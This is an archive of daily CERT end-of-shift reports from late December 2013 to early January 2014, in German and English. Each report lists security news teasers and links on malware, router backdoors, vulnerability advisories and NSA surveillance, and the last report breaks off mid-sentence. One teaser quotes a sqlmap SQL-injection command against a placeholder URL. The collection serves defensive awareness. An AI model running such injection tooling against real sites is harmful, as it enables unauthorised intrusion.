http://www.heise.de/security/meldung/Falscher-Alarm-Avast-fuer-Android-hael… *** WordPress-Angreifer lieben TimThumb *** --------------------------------------------- Akamai hat Attacken auf WordPress-Erweiterungen untersucht und festgestellt, dass sich die Angreifer vor allem auf ein Plug-in eingeschossen haben. --------------------------------------------- http://www.heise.de/security/meldung/WordPress-Angreifer-lieben-TimThumb-20… *** Critics Cut Deep on Yahoo Mail Encryption Rollout *** --------------------------------------------- Yahoo has turned on HTTPS by default for its web-based email service, but the deployment is inconsistent across the board and experts are critical of its use of weak standards and the lack of Perfect Forward Secrecy and HSTS. --------------------------------------------- http://threatpost.com/critics-cut-deep-on-yahoo-mail-encryption-rollout/103… *** Drupal Media 7.x Access Bypass *** --------------------------------------------- Topic: Drupal Media 7.x Access Bypass Risk: High Text:View online: https://drupal.org/node/2169767 * Advisory ID: PSA-2014-001 * Project: Media [1] (third-party module) ... --------------------------------------------- http://cxsecurity.com/issue/WLB-2014010051

1 0

Tageszusammenfassung - Mittwoch 8-01-2014
by Daily end-of-shift report 08 Jan '14

08 Jan '14

======================= = End-of-Shift report = ======================= Timeframe: Dienstag 07-01-2014 18:00 − Mittwoch 08-01-2014 18:00 Handler: Alexander Riepl Co-Handler: Stephan Richter *** 64-bit ZBOT Leverages Tor, Improves Evasion Techniques *** --------------------------------------------- Reports have surfaced that ZeuS/ZBOT, the notorious online banking malware, is now targeting 64-bit systems. During our own investigation, we have confirmed that several ZBOT 32-bit samples (detected as TSPY_ZBOT.AAMV) do have an embedded 64-bit version (detected as TSPY64_ZBOT.AANP). However, our investigation also lead us to confirm other noteworthy routines of the malware, including its... --------------------------------------------- http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/RjjdkzMleq4/ *** Malicious Ads on DailyMotion Redirect to Fake AV Attack *** --------------------------------------------- Popular video-sharing site DailyMotion is serving malicious ads that redirect site visitors to domains hosting Fake AV malware, security firm Invincea reports. --------------------------------------------- http://threatpost.com/malicious-ads-on-dailymotion-redirect-to-fake-av-atta… *** Einbruch in die Opensuse-Foren *** --------------------------------------------- Die öffentlichen Opensuse-Foren sind Opfer eines Angriffs geworden und derzeit abgeschaltet. --------------------------------------------- http://www.heise.de/security/meldung/Einbruch-in-die-Opensuse-Foren-2078128… *** Yahoo Mail: Verschlüsselung wird endlich Default *** --------------------------------------------- Alle Kommunikation mit Webmail-Service nun per HTTPS abgesichert - Aber kein Perfect Forward Secrecy --------------------------------------------- http://derstandard.at/1388650341295 *** Satellite Links for Remote Networks May Pose Soft Target for Attackers *** --------------------------------------------- Land-based terminals that send data to satellites may pose a soft target for hackers, an analysis from a computer security firm shows. VSATs, an abbreviation for "very small aperture terminals," supply Internet access to remote locations, enabling companies to transmit data from an isolated network to an organizations main one. The devices are used in a variety of industries, including energy, financial services and defense. --------------------------------------------- http://www.cio.com/article/745580/Satellite_Links_for_Remote_Networks_May_P… *** Linux Kernel, Font Bugs Fixed in Ubuntu *** --------------------------------------------- A huge number of security vulnerabilities have been fixed in Ubuntu, including a remotely exploitable font flaw that an attacker could use to run arbitrary code on vulnerable machines. A number of Linux kernel flaws also were patched in some versions of the operating system. The font vulnerability affects five different versions of Ubuntu, including... --------------------------------------------- http://threatpost.com/linux-kernel-font-bugs-fixed-in-ubuntu/103500 *** VU#487078: QNAP QTS path traversal vulnerability *** --------------------------------------------- Vulnerability Note VU#487078 QNAP QTS path traversal vulnerability Original Release date: 08 Jan 2014 | Last revised: 08 Jan 2014 Overview QNAP QTS 4.0.3 and possibly earlier versions contain a path traversal vulnerability. Description CWE-22: Improper Limitation of a Pathname to a Restricted Directory (Path Traversal) - CVE-2013-7174QNAP QTS is a Network-Attached Storage (NAS) system accessible via a web interface. QNAP QTS 4.0.3 and possibly earlier versions contain a path traversal... --------------------------------------------- http://www.kb.cert.org/vuls/id/487078 *** Vuln: Cisco Unified Communications Manager Unauthorized Access Vulnerability *** --------------------------------------------- http://www.securityfocus.com/bid/64690 *** HP 2620 Switch Series Cross-Site Request Forgery Vulnerability *** --------------------------------------------- https://secunia.com/advisories/56290

1 0

Tageszusammenfassung - Dienstag 7-01-2014
by Daily end-of-shift report 07 Jan '14

07 Jan '14

======================= = End-of-Shift report = ======================= Timeframe: Freitag 03-01-2014 18:00 − Dienstag 07-01-2014 18:00 Handler: Alexander Riepl Co-Handler: Matthias Fraidl *** Router auf Backdoor testen *** --------------------------------------------- Die Netzwerkausrüster hüllen sich nach wie vor über den Zweck des kürzlich entdeckten, undokumentierten Router-Dienstes in Schweigen. So finden Sie heraus, ob Ihr Router ebenfalls auf Befehle wartet. --------------------------------------------- http://www.heise.de/security/meldung/Router-auf-Backdoor-testen-2074844.html *** Backdoor in Routern: Hersteller rätseln und analysieren *** --------------------------------------------- Noch immer können die Router-Hersteller keine plausible Erklärung dafür liefern, dass auf auf ihren Geräten ein undokumentierter Konfigurationsdienst läuft. Sie sind nach eigenen Angaben selbst noch mit der Analyse beschäftigt. --------------------------------------------- http://www.heise.de/newsticker/meldung/Backdoor-in-Routern-Hersteller-raets… *** Distributionen patchen Drupal -- außer Ubuntu *** --------------------------------------------- Debian und Fedora liefern Sicherheitsupdates für kürzlich gemeldete Sicherheitsprobleme in Drupal. Wer Ubuntu nutzt, muss sich jedoch selber kümmern. --------------------------------------------- http://www.heise.de/security/meldung/Distributionen-patchen-Drupal-ausser-U… *** Recent Windows Zero-Day Targeted Embassies, Used Syria-related Email *** --------------------------------------------- In late November, Microsoft revealed that a zero-day vulnerability was in use in targeted attacks against Windows XP and Server 2003 systems. From samples of the exploit examined, it has a backdoor payload that possesses sophisticated anti-analysis techniques. Further research of this earlier attack - discussed in the blog posts above - has revealed that the exploit was deployed via... --------------------------------------------- http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/xqgSESnrQns/ *** A Year of Spam: The Notable Trends of 2013 *** --------------------------------------------- 2013 was a year of change inthe spam landscape. The volume of spam increased from 2012. We witnessed the decline of a previously-successful exploit kit. The old became new again, thanks to different techniques used by spammers. While we still saw traditional types of spam, we also saw several "improvements" which allowed spammers to avoid... --------------------------------------------- http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/uZ0knuU7r3A/ *** Malware Deployed by Fake Digital Certificates Bypassing Endpoint Security *** --------------------------------------------- Enterprises that place unwavering faith in the sanctity of digital certificates may want to re-think that belief, now that the latest chapter in the Win32/Winwebsec malware saga has revealed a troubling new development: the use of stolen authentication credentials. Win32/Winwebsec is the catch-all term used by Microsoft to reference a group of fake anti-virus programs [...] --------------------------------------------- http://www.seculert.com/blog/2014/01/malware-deployed-by-fake-digital-certi… *** Ransomware: Powerlocker wird für 100 US-Dollar angeboten *** --------------------------------------------- Die Gruppe Malware Crusaders warnt vor einer neuen Ransomware, die nicht nur besser verschlüsselt, sondern mit zusätzlichen Funktionen ausgestattet ist. In einschlägigen Foren wird Powerlocker bereits für 100 US-Dollar angeboten. (Virus, Malware) --------------------------------------------- http://www.golem.de/news/ransomware-powerlocker-wird-fuer-100-us-dollar-ang… *** Malicious Advertisements served via Yahoo *** --------------------------------------------- Fox-IT operates the shared Security Operations Center service ProtACT. This service monitors the networks of our clients for malicious activity. On January 3 we detected and investigated the infection of clients after they visited yahoo.com. --------------------------------------------- http://blog.fox-it.com/2014/01/03/malicious-advertisements-served-via-yahoo/ *** WordPress Connect plugin for WordPress unspecified cross-site scripting *** --------------------------------------------- http://xforce.iss.net/xforce/xfdb/90106 *** Debian devscripts uscan.pl code execution *** --------------------------------------------- http://xforce.iss.net/xforce/xfdb/90107 *** [2013-12-27] XPath Injection in IBM Web Content Manager *** --------------------------------------------- By exploiting the identified XPath Injection vulnerability, an unauthenticated user is able to extract sensitive application configuration data from vulnerable installations of IBM Web Content Manager. --------------------------------------------- https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/2013… *** HP Data Protector code execution *** --------------------------------------------- http://xforce.iss.net/xforce/xfdb/90001 http://xforce.iss.net/xforce/xfdb/90002 http://xforce.iss.net/xforce/xfdb/90003

1 0

Tageszusammenfassung - Freitag 3-01-2014
by Daily end-of-shift report 03 Jan '14

03 Jan '14

======================= = End-of-Shift report = ======================= Timeframe: Donnerstag 02-01-2014 18:00 − Freitag 03-01-2014 18:00 Handler: Alexander Riepl Co-Handler: L. Aaron Kaplan *** Greyhats expose 4.5 million Snapchat phone numbers using 'theoretical' hack *** --------------------------------------------- Snapchat largely discounted weakness that partially exposed user numbers. --------------------------------------------- http://feeds.arstechnica.com/~r/arstechnica/security/~3/8aPSkYeU_SA/ *** Target's Use of 3DES Encryption Invites Scrutiny, Worry *** --------------------------------------------- Targets admission that encrypted PIN data was stolen and secured with 3DES encryption has experts concerned because of the age of the algorithm and the availability of stronger options. --------------------------------------------- http://threatpost.com/targets-use-of-3des-encryption-invites-scrutiny-worry… *** Mysterioese Backdoor in diversen Router-Modellen *** --------------------------------------------- Auf Routern von Linksys und Netgear lauscht ein undokumentierter Dienst, der auf Befehle wartet. Bislang gibt es lediglich ein Indiz dafuer, was es damit auf sich haben koennte. --------------------------------------------- http://www.heise.de/newsticker/meldung/Mysterioese-Backdoor-in-diversen-Rou… *** Scans Increase for New Linksys Backdoor (32764/TCP), (Thu, Jan 2nd) *** --------------------------------------------- We do see a lot of probes for port 32764/TCP . According to a post to github from 2 days ago, some Linksys devices may be listening on this port enabling full unauthenticated admin access. [1] At this point, I urge everybody to scan their networks for devices listening on port 32764/TCP. If you use a Linksys router, try to scan its public IP address from outside your network. Our data shows almost no scans to the port prior to today, but a large number from 3 source IPs today. The by far --------------------------------------------- http://isc.sans.edu/diary.html?storyid=17336&rss *** NSA Exploit of the Day: DEITYBOUNCE *** --------------------------------------------- Todays item from the NSAs Tailored Access Operations (TAO) group implant catalog is DEITYBOUNCE: DEITYBOUNCE (TS//SI//REL) DEITYBOUNCE provides software application persistence on Dell PowerEdge servers by exploiting the motherboard BIOS and utilizing System Management Mode (SMM) to gain periodic execution while the Operating System loads. (TS//SI//REL) This technique supports multi-processor systems with RAID hardware and Microsoft Windows 2000, 2003, and... --------------------------------------------- https://www.schneier.com/blog/archives/2014/01/nsa_exploit_of.html *** Advanced Dewplayer plugin for WordPress download-file.php directory traversal *** --------------------------------------------- Advanced Dewplayer plugin for WordPress download-file.php directory traversal --------------------------------------------- http://xforce.iss.net/xforce/xfdb/89978 *** "Penetrating Hard Targets": NSA arbeitet an Quantencomputern zur Kryptoanlayse *** --------------------------------------------- Dokumente des NSA-Whistleblowers Edward Snowden legen nahe, dass die NSA bei der Entwicklung von Quantencomputern keinen Vorsprung hat. Mit derartiger Technik koennte bestehende Public-Key-Kryptographie geknackt werden. --------------------------------------------- http://www.heise.de/security/meldung/Penetrating-Hard-Targets-NSA-arbeitet-… *** HPSBMU02895 SSRT101253 rev.1 - HP Data Protector, Remote Increase of Privilege, Denial of Service (DoS), Execution of Arbitrary Code *** --------------------------------------------- Potential security vulnerabilities have been identified with HP Data Protector. These vulnerabilities could be remotely exploited to allow an increase of privilege, create a Denial of Service (DoS), or execute arbitrary code. --------------------------------------------- http://h20565.www2.hp.com/portal/site/hpsc/template.PAGE/public/kb/docDispl… *** Bundesnetzagentur praesentiert Entwurf des IT-Sicherheitskatalogs *** --------------------------------------------- Eine Liste von Sicherheitsanforderungen soll die IT-Infrastruktur unserer Stromnetze absichern. Bis Februar kann man diesen Entwurf noch kommentieren. --------------------------------------------- http://www.heise.de/newsticker/meldung/Bundesnetzagentur-praesentiert-Entwu… *** Cost/Benefit Analysis of NSAs 215 Metadata Collection Program *** --------------------------------------------- It has amazed me that the NSA doesnt seem to do any cost/benefit analyses on any of its surveillance programs. This seems particularly important for bulk surveillance programs, as they have significant costs aside from the obvious monetary costs. In this paper, John Mueller and Mark G. Stewart have done the analysis on one of these programs. Worth reading.... --------------------------------------------- https://www.schneier.com/blog/archives/2014/01/costbenefit_ana_1.html *** UPDATED X1 : OpenSSL.org Defaced by Attackers Gaining Access to Hypervisor, (Thu, Jan 2nd) *** --------------------------------------------- By now, most of you have heard that the openssl.org website was defaced. While the source code and repositories were not tampered with, this obviously concerned people. What is more interesting is that the attack was made possible by gaining access to the hypervisor that hosts the VM responsible for the website. Attacks of this sort are likely to be more common as time goes on as it provides easy ability to take over a host without having to go through the effort of actually rooting a box. --------------------------------------------- http://isc.sans.edu/diary.html?storyid=17333&rss *** Bankautomaten per USB-Stick uebernommen *** --------------------------------------------- Sicherheitsforscher haben Schadcode entdeckt, der per USB-Stick auf Geldautomaten geladen wird und Ganoven dann beliebig Geld auszahlt. Die Malware enthaelt ausserdem raffinierte Funktionen, die den Hintermaennern Kontrolle ueber die Auszahlungen gibt --------------------------------------------- http://www.heise.de/security/meldung/Bankautomaten-per-USB-Stick-uebernomme… *** Ubuntu bessert TLSv1.2-Unterstuetzung nach *** --------------------------------------------- In aktuellen Ubuntu-Versionen kann die zentrale Crypto-Bibliothek OpenSSL kein TLSv1.2; das soll sich erst mit Ubuntu 14.04 LTS aendern. --------------------------------------------- http://www.heise.de/security/meldung/Ubuntu-bessert-TLSv1-2-Unterstuetzung-… *** Ueberwachung: BND fischt deutlich weniger Kommunikation ab *** --------------------------------------------- Der Bundesnachrichtendienst hat seine Filtermethoden offenbar verbessert. Im Jahr 2012 sind viel weniger verdaechtige Kommunikationsinhalte als in den Vorjahren in den Netzen haengengeblieben. (Datenschutz, DE-CIX) --------------------------------------------- http://www.golem.de/news/ueberwachung-bnd-fischt-deutlich-weniger-kommunika… *** Slovenian jailed for creating code behind 12 MILLION strong Mariposa botnet army *** --------------------------------------------- A Slovenian virus writer who created an infamous strain of malware used to infect an estimated 12 million computers worldwide has been jailed for almost five years. --------------------------------------------- http://www.theregister.co.uk/2014/01/03/mariposa_botnet_mastermind_jailed/

1 0

Tageszusammenfassung - Donnerstag 2-01-2014
by Daily end-of-shift report 02 Jan '14

02 Jan '14

======================= = End-of-Shift report = ======================= Timeframe: Montag 30-12-2013 18:00 − Donnerstag 02-01-2014 18:00 Handler: L. Aaron Kaplan Co-Handler: Stephan Richter *** Joseph Stiglitz on Trust *** --------------------------------------------- Joseph Stiglitz has an excellent essay on the value of trust, and the lack of it in todays society. Trust is what makes contracts, plans and everyday transactions possible; it facilitates the democratic process, from voting to law creation, and is necessary for social stability. It is essential for our lives. It is trust, more than money, that makes the... --------------------------------------------- https://www.schneier.com/blog/archives/2013/12/joseph_stiglitz.html *** Sqlmap Tricks for Advanced SQL Injection *** --------------------------------------------- Sqlmap is an awesome tool that automates SQL Injection discovery and exploitation processes. I normally use it for exploitation only because I prefer manual detection in order to avoid stressing the web server or being blocked by IPS/WAF devices. Below I provide a basic overview of sqlmap and some configuration tweaks for finding trickier injection points. Basics Using sqlmap for classic SQLi is very straightforward: ./sqlmap.py -u http://mywebsite.com/page.php?vulnparam=hello The target URL... --------------------------------------------- http://blog.spiderlabs.com/2013/12/sqlmap-tricks-for-advanced-sql-injection… *** NSA Surveillance Has No Boundaries, Expert Says *** --------------------------------------------- Expert Jacob Appelbaums keynote at CCC describes the deep catalog of hacks and backdoors at the NSAs disposal. --------------------------------------------- http://threatpost.com/nsa-surveillance-has-no-boundaries-expert-says/103355 *** Protecting the data about data *** --------------------------------------------- It has been said that encryption simply trades one secret (the data) for another (the key). In the same way, encrypting data naturally shifts attention to that which is not protected: the metadata. --------------------------------------------- http://www.scmagazine.com//protecting-the-data-about-data/article/327122/ *** Yes, the BBC still uses FTP. And yes, a Russian crook hacked the server *** --------------------------------------------- Convenient file-store a convenient target for crook touting access A BBC FTP server ftp.bbc.co.uk was compromised by a Russian hacker and access to it touted online, say computer security researchers. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2013/12/30/bbc_ftp_ser… *** Why NSA spied on inexplicably unencrypted Windows crash reports *** --------------------------------------------- Windows reports what hardware you have and what software doesnt work. --------------------------------------------- http://feeds.arstechnica.com/~r/arstechnica/security/~3/CCjtHJ8WSwY/ *** 30C3: Sicherheitsalbträume des Jahres 2014 *** --------------------------------------------- Unmodulierte Basisbandsysteme stellen nach Ansicht von Sicherheitsexperten des CCC lohnende Angriffsziele dar. Im Biometrie-Segment habe Apple mit Touch ID "die Büchse der Pandora" geöffnet. --------------------------------------------- http://www.heise.de/newsticker/meldung/30C3-Sicherheitsalbtraeume-des-Jahre… *** Juniper SSL VPN and UAC Host Checker Issue, (Tue, Dec 31st) *** --------------------------------------------- A few readers have written asking about odd denials when trying to use Juniper VPNs. Turns out they released a Product Support Notification (subscription required) about their host check feature which fails on endpoints that have a local date set 12/31/2013 or later. There are working on a fix but as a workaround, you can change the local date on the PC, disable host checker verification all together or create a manual host checker process that disables checking firewall, anti-virus and/or --------------------------------------------- http://isc.sans.edu/diary.html?storyid=17321&rss *** X11/X.Org Security In Bad Shape *** --------------------------------------------- An anonymous reader writes "A presentation at the Chaos Communication Congress explains how X11 Server security with being worse than it looks. The presenter found more than 120 bugs in a few months of security research and is not close to being done in his work. Upstream X.Org developers have begun to call most of his claims valid. The presentation by Ilja van Sprunde is available for streaming." Read more of this story at Slashdot. --------------------------------------------- http://rss.slashdot.org/~r/Slashdot/slashdot/~3/W_cx3sKOALE/story01.htm *** Administratoren! Machet Krypto, aber besser... *** --------------------------------------------- Bettercrypto hilft Systemadmins, Verschlüsselung einzurichten und zu verbessern. Copy&Paste ist gewünscht, Verbesserungsvorschläge ebenso. --------------------------------------------- http://www.heise.de/newsticker/meldung/Administratoren-Machet-Krypto-aber-b… *** Dual_EC_DRBG Backdoor: a Proof of Concept *** --------------------------------------------- New submitter Reliable Windmill sends this followup to the report that RSA took money from the NSA to use backdoored tech for random number generation in encryption software. From the article: "Dual_EC_DRBG is an pseudo-random number generator promoted by NIST in NIST SP 800-90A and created by NSA. This algorithm is problematic because it has been made mandatory by the FIPS norm (and should be implemented in every FIPS approved software) and some vendors even promoted this algorithm as... --------------------------------------------- http://rss.slashdot.org/~r/Slashdot/slashdot/~3/_PXJ0M1qmQI/story01.htm *** Hacker finden Hintertüren in Netgear- und Linksys-Routern *** --------------------------------------------- Ein findiger Hacker hat in den vergagnenen Tagen einen seltsamen Hintergrunddienst auf seinem Router entdeckt. Darüber kann sich jeder Zugang zu seinem Netzwerk verschaffen. --------------------------------------------- http://futurezone.at/netzpolitik/hacker-finden-hintertueren-in-netgear-und-… *** Österreichische Begeh: Kopierbarkeit von RFID-Schlüssel bekannt *** --------------------------------------------- Unternehmen hat nach 30C3-Vortrag von Adrian Dabrowski Stellung bezogen --------------------------------------------- http://derstandard.at/1388649760468 *** Manipulierte Speicherkarten als Malware-Versteck *** --------------------------------------------- Hacker zeigen Angriff gegen eingebetteten Mikrokontroller - Daten können vor dem Betriebssystem versteckt werden --------------------------------------------- http://derstandard.at/1388649791611 *** Snapchat schweigt nach Datenleck *** --------------------------------------------- Der Anbieter der Foto-App Snapchat äußert sich bisher nicht zu dem Vorfall, bei dem Unbekannte die Daten von 4,6 Millionen Kunden erbeutet haben. Zuvor hatte das Unternehmen Warnungen von Sicherheitsexperten in den Wind geschlagen. --------------------------------------------- http://www.heise.de/security/meldung/Snapchat-schweigt-nach-Datenleck-20742… *** memcached mit löchriger Authentifizierung *** --------------------------------------------- Die SASL-Authentifizierung des Cache-Servers ist zu gutmütig. Auch mit ungültigen Zugangsdaten kommt man beim zweiten Versuch rein. --------------------------------------------- http://www.heise.de/security/meldung/memcached-mit-loechriger-Authentifizie… *** OpenSSL.org Defaced by Attackers Gaining Access to Hypervisor, (Thu, Jan 2nd) *** --------------------------------------------- By now, most of you have heard that the openssl.org website was defaced. While the source code and repositories were not tampered with, this obviously concerned people. What is more interesting is that the attack was made possible by gaining access to the hypervisor that hosts the VM responsible for the website. Attacks of this sort are likely to be more common as time goes on as it provides easy ability to take over a host without having to go through the effort of actually rooting a box. --------------------------------------------- http://isc.sans.edu/diary.html?storyid=17333&rss *** Der Spiegel Article on Networking Equipment Infiltration *** --------------------------------------------- On December 29, 2013, the German news publication Der Spiegel published an article referencing leaked documents from the U.S. National Security Agency (NSA) that mentioned "software implants" for networking devices. Cisco is one of a number of technology companies mentioned in the article... --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityResponse/cisco-… *** Security Notice-Statement About the Networking Equipment Infiltration Article in Der Spiegel *** --------------------------------------------- On December 29, 2013, German news agency Der Spiegel published a report titled "Shopping for Spy Gear: Catalog Advertises NSA Toolbox" and described Huawei as one of the vendors that might be impacted. --------------------------------------------- http://www.huawei.com/en/security/psirt/security-bulletins/security-notices… *** Security Advisory-A DoS Vulnerability in the SSH Module on Huawei AR Router *** --------------------------------------------- On Some Huawei AR routers that receive a large number of SSH authentication attack packets with malformed data, legitimate users fail to log in through SSH. Attackers can construct massive attack packets to cause the AR routers to deny SSH login from legitimate users. (HWPSIRT-2013-1255). --------------------------------------------- http://www.huawei.com/en/security/psirt/security-bulletins/security-advisor… *** Vuln: mod_nss Module NSSVerifyClient CVE-2013-4566 Authentication Bypass Vulnerability *** --------------------------------------------- http://www.securityfocus.com/bid/64114 *** Vuln: libgadu SSL Certificate Validation CVE-2013-4488 Security Bypass Vulnerability *** --------------------------------------------- http://www.securityfocus.com/bid/63473 *** Debian update for ruby-i18n *** --------------------------------------------- https://secunia.com/advisories/56212 *** DSA-2833 openssl *** --------------------------------------------- several vulnerabilities --------------------------------------------- http://www.debian.org/security/2014/dsa-2833 *** DSA-2832 memcached *** --------------------------------------------- several vulnerabilities --------------------------------------------- http://www.debian.org/security/2014/dsa-2832 *** DSA-2831 puppet *** --------------------------------------------- insecure temporary files --------------------------------------------- http://www.debian.org/security/2013/dsa-2831 *** Debian update for typo3-src *** --------------------------------------------- https://secunia.com/advisories/56266

1 0

Tageszusammenfassung - Montag 30-12-2013
by Daily end-of-shift report 30 Dec '13

30 Dec '13

======================= = End-of-Shift report = ======================= Timeframe: Freitag 27-12-2013 18:00 − Montag 30-12-2013 18:00 Handler: Stephan Richter Co-Handler: n/a *** eBay Vulnerable to Account Hijacking Via XSRF *** --------------------------------------------- A researcher reported a cross-site request forgery vulnerability to eBay in August, and despite repeated communication from the online auction that the code has been repaired, the site remains vulnerable to exploit. --------------------------------------------- http://threatpost.com/ebay-vulnerable-to-account-hijacking-via-xsrf/103311 *** 12 Days of HaXmas: Meterpreter, Reloaded *** --------------------------------------------- Over the last quarter of 2013, we here in the Democratic Freehold of Metasploit found that we needed to modernize our flagship remote access toolkit (RAT), Meterpreter. That started with cleaving Meterpreter out of the main Metasploit repository and setting it up with its own repository, and then bringing in a dedicated Meterpreter hacker, the indomitable OJ TheColonial Reeves. We couldn't be happier with the results so far. --------------------------------------------- https://community.rapid7.com/community/metasploit/blog/2013/12/27/meterpret… *** 12 Days of HaXmas: Exploiting (and Fixing) RJS Rails Info Leaks *** --------------------------------------------- Several weeks ago, Egor Homakov wrote a blog post pointing out a common info leak vulnerability in many Rails apps that utilize Remote JavaScript. The attack vector and implications can be hard to wrap your head around, so in this post I'll explain how the vulnerability occurs and how to exploit it. --------------------------------------------- https://community.rapid7.com/community/metasploit/blog/2013/12/29/remote-js… *** Major flaw discovered in mobile software used by govt agencies *** --------------------------------------------- The vulnerability discovered by an Israeli security researcher affects Samsungs Galaxy S4 device, which is currently used by government agencies. --------------------------------------------- http://www.scmagazine.com/major-flaw-discovered-in-mobile-software-used-by-… *** Who's Still Robbing ATMs with USB Sticks? *** --------------------------------------------- Here's one quick way to rob a bank, over and over again. Find an ATM running Windows XP. Skeptical? Don't be, they're still installed all around the world. Next, cut a piece from its chassis to expose its USB port. ... --------------------------------------------- http://www.wired.com/threatlevel/2013/12/whos-robbing-atms-usb-stick/ *** NTP reflection attack, (Fri, Dec 27th) *** --------------------------------------------- Symantec has notice in the last few weeks that there is a significant NTP reflection attacks. NTP is Network time protocol and it's used to synch the time between client and server, it is a UDP protocol and it's run on port 123. In the NTP reflection attack the attacker send a crafted packet which request a large amount of date send to the host. "In this case, the attackers are taking advantage of the monlist command. Monlist is a remote command in older version of NTP that... --------------------------------------------- http://isc.sans.edu/diary.html?storyid=17300 *** DRG online challenge(s), (Sat, Dec 28th) *** --------------------------------------------- For the last couple of months DRG (the Dragon Research Group) has posted some interesting security challenges. The last one, for December, is currently online so if you want to test your security skills - and post the solutions for the public benefit, do not miss the current challenge available at http://dragonresearchgroup.org/challenges/201312/ Those of you who like playing CTFs will enjoy this. Other (older) challenges are still online too, so if you have some time off here's... --------------------------------------------- http://isc.sans.edu/diary.html?storyid=17306 *** 30C3: Keine Hintertüren in Tor *** --------------------------------------------- Roger Dingledine, Vater des Tor-Netzwerks, hat auf dem Hamburger Hackerkongress erklärt, dass eine Vertreterin des US-Justizministeriums auf eine bessere Überwachbarkeit des Anonymisierungsdienstes gedrängt habe. --------------------------------------------- http://www.heise.de/security/meldung/30C3-Keine-Hintertueren-in-Tor-2072708… *** The story of a Trojan Dropper I *** --------------------------------------------- Introduction: Recently, Zscaler ThreatlabZ received a suspicious file from one of our customers, which was named "OrderDetails.zip". After extracting the executable file from the archive I have performed a virustotal scan to get some information about the file. At that time, very few antivirus vendors had definitions in place, which flagged the file as malicious. As such, I decided... --------------------------------------------- http://research.zscaler.com/2013/12/the-story-of-trojan-dropper-i.html *** The story of a Trojan dropper II *** --------------------------------------------- Analysis: Lets analyze the PE file in detail and see what it's up to. Like most malware, this sample was packed and in order to properly analyze it, we must begin by unpacking the binary. Keeping this in mind, I began by debugging the file, hoping to find the reference to the data section in order to determine precisely where the encrypted portion of data was to be found. Fortunately,... --------------------------------------------- http://research.zscaler.com/2013/12/the-story-of-trojan-dropper-ii.html *** RFID-Begehcard: Mit dem Skipass in Wiens Wohnhäuser *** --------------------------------------------- "Österreich ist sicher", heißt es vollmundig auf der Webseite des Begehsystems. Doch Häuser, die ihren Eingang mit der Begehcard sichern, sind leicht zu öffnen. Alles, was man dazu braucht, ist ein neu programmierbarer RFID-Skipass. (RFID, Sicherheitslücke) --------------------------------------------- http://www.golem.de/news/rfid-begehcard-ohne-sicherheit-mit-dem-skipass-in-… *** Open-Source Release of MANTIS Cyber-Threat Intelligence Management Framework *** --------------------------------------------- Today, Siemens CERT is releasing the "MANTIS Cyber-Threat Intelligence Management Framework" as Open Source under GPL2+. --------------------------------------------- http://making-security-measurable.1364806.n2.nabble.com/Open-Source-Release… *** The Year in NSA *** --------------------------------------------- It's that most wonderful time of the year, the time when everyone with access to an email machine puts together a list of the best or worst of whatever happened in the last 12 months. In the computer security world, there is no doubt that such a list would find NSA stories in places one... --------------------------------------------- http://threatpost.com/the-year-in-nsa/103329 *** PIN Skimmer offers a new side channel attack against mobile devices *** --------------------------------------------- Researchers with the University of Cambridge revealed just how effective PIN Skimmers can be against mobile devices in a recently released study on the new type of side-channel attack. --------------------------------------------- http://www.scmagazine.com/pin-skimmer-offers-a-new-side-channel-attack-agai… *** HP Application Information Optimizer Flaw in Archive Query Server Lets Remote Users Execute Arbitrary Code *** --------------------------------------------- http://www.securitytracker.com/id/1029542 *** HP Service Manager Input Validation Hole Permits Cross-Site Scripting Attacks *** --------------------------------------------- http://www.securitytracker.com/id/1029541 *** HPSBMU02959 rev.1 - HP Service Manager WebTier and Windows Client, Cross-Site Scripting (XSS), Execution of Arbitrary Code and other Vulnerabilities *** --------------------------------------------- Potential security vulnerabilities have been identified with HP Service Manager WebTier and Windows Client. The vulnerabilities could be remotely exploited including cross-site scripting (XSS) and execution of arbitrary code. --------------------------------------------- https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_… *** DSA-2828 drupal6 *** --------------------------------------------- several vulnerabilities --------------------------------------------- http://www.debian.org/security/2013/dsa-2828 Next End-of-Shift Report on 2014-01-02

1 0

Tageszusammenfassung - Freitag 27-12-2013
by Daily end-of-shift report 27 Dec '13

27 Dec '13

======================= = End-of-Shift report = ======================= Timeframe: Montag 23-12-2013 18:00 − Freitag 27-12-2013 18:00 Handler: Matthias Fraidl Co-Handler: n/a *** Hintergrund: Erfolgreicher Angriff auf Linux-Verschlüsselung *** --------------------------------------------- Linux Unified Key Setup (LUKS) ist das Standardverfahren für die Komplettverschlüsselung der Festplatte unter Linux; viele Systeme, darunter Ubuntu 12.04 LTS, setzen dabei LUKS im CBC-Modus ein. Jakob Lell demonstriert, dass diese Kombination anfällig für das Einschleusen einer Hinterür ist. --------------------------------------------- http://www.heise.de/security/artikel/Erfolgreicher-Angriff-auf-Linux-Versch… *** Protection metrics - November results *** --------------------------------------------- In our October results, we talked about a trio of families related to Win32/Sefnit. Our November results showed progress against Sefnit and the installers and downloaders of Sefnit (Win32/Rotbrow and Win32/Brantall). In comparison to September, active Sefnit infections have been reduced by 82 percent. As with prior months, our rate of incorrect detections also remained low and performance stayed consistent. --------------------------------------------- http://blogs.technet.com/b/mmpc/archive/2013/12/23/protection-metrics-novem… *** Turkey: Understanding high malware encounter rates in SIRv15 *** --------------------------------------------- In our most recent version of the Security Intelligence Report, we compared the encounter rates of malware categories for the top 10 countries with computers reporting the most detections in 2Q13. Amongst these countries, Turkey stood out with considerably high encounter rates in multiple categories. Encounter rate is the percentage of computers in a country that reported at least one detection of malware. --------------------------------------------- http://blogs.technet.com/b/mmpc/archive/2013/12/23/turkey-understanding-hig… *** Popular Registrar Namecheap Fixes DNS Hijack Bug *** --------------------------------------------- The domain registrar and Web-hosting company Namecheap has fixed a cross site request forgery vulnerability in its DNS setup page. --------------------------------------------- http://threatpost.com/popular-registrar-namecheap-fixes-dns-hijack-bug/1032… *** What a successful exploit of a Linux server looks like *** --------------------------------------------- Like most mainstream operating systems these days, fully patched installations of Linux provide a level of security that requires a fair amount of malicious hacking to overcome. Those assurances can be completely undone by a single unpatched application, as Andre' DiMino has demonstrated when he documented an Ubuntu machine in his lab being converted into a Bitcoin-mining, denial-of-service-spewing, 